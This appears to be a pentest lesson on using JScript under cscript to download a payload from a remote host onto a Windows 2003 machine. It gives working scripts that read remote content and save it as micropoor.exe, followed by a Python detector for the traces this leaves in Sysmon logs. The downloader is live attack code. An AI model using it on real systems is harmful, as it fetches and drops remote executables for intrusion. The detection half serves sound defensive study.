Every version of Windows supports JS (JScript via Windows Script Host) out of the box, and cscript can be used to run it in order to download a payload.

Target machine: Windows 2003

Read (fetch the remote content and print it):

  C:\test>cscript /nologo downfile.js http://192.168.1.115/robots.txt

[Figure 1: Lesson 43: JS one-liner payload download, output of the read example]

Code:

  // Create a WinHTTP request object via COM (available on all supported Windows versions)
  var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  // First command-line argument is the URL; the request is synchronous
  WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
  WinHttpReq.Send();
  // Print the response body as text to stdout
  WScript.Echo(WinHttpReq.ResponseText);

Write (fetch the remote content and save it to a file):

  C:\test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt

[Figure 2: Lesson 43: JS one-liner payload download, output of the write example]

Code:

  var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
  WinHttpReq.Send();
  // ADODB.Stream in binary mode (Type = 1) so the raw bytes are written unchanged
  var BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
  BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
  // Save the response body to disk in the current directory
  BinStream.SaveToFile("micropoor.exe");

As for the latter: simple, easy to use, and lightweight.
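From the defender's side, an added example that is not part of the original lesson: a small Python detector run over constructed Sysmon-style process-creation (Event ID 1) and file-creation (Event ID 11) records. It flags the two traces this technique leaves, a script host (cscript.exe/wscript.exe) started with a script file and a URL on its command line, and a script host writing an executable to disk. The field names and the sample records are assumptions, constructed for the example.

```python
import re

# Constructed sample events in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript /nologo downfile.js http://192.168.1.115/robots.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript //nologo C:\scripts\inventory.js",   # benign: no URL
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 11, "Image": r"C:\Windows\System32\cscript.exe",
     "TargetFilename": r"C:\test\micropoor.exe"},
    {"EventID": 1, "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "iexplore http://intranet/",                   # not a script host
     "ParentImage": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")
URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
SCRIPT_RE = re.compile(r"\S+\.(?:js|jse|vbs|vbe|wsf)\b", re.IGNORECASE)
DROPPED_EXT = (".exe", ".dll", ".scr")

def is_script_host(image):
    """True when the executing image is one of the Windows Script Host binaries."""
    return image.lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS

def classify(event):
    """Return a finding label for one event, or None when nothing is suspicious."""
    if not is_script_host(event.get("Image", "")):
        return None
    if event.get("EventID") == 1:
        cmd = event.get("CommandLine", "")
        # A script file plus a URL argument matches the downloader pattern above
        if SCRIPT_RE.search(cmd) and URL_RE.search(cmd):
            return "script-host-url-download"
    if event.get("EventID") == 11:
        # A script host creating an executable is the "write" variant's footprint
        if event.get("TargetFilename", "").lower().endswith(DROPPED_EXT):
            return "script-host-dropped-executable"
    return None

def detect(events):
    """Return (label, evidence) pairs for every event that matches a rule."""
    findings = []
    for event in events:
        label = classify(event)
        if label:
            findings.append((label, event.get("CommandLine") or event.get("TargetFilename")))
    return findings

if __name__ == "__main__":
    for label, evidence in detect(SAMPLE_EVENTS):
        print(label, "->", evidence)
```

Correlating the two labels on the same host within a short window (script host with URL, then script host dropping an executable) gives a higher-confidence alert than either rule alone.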

Micropoor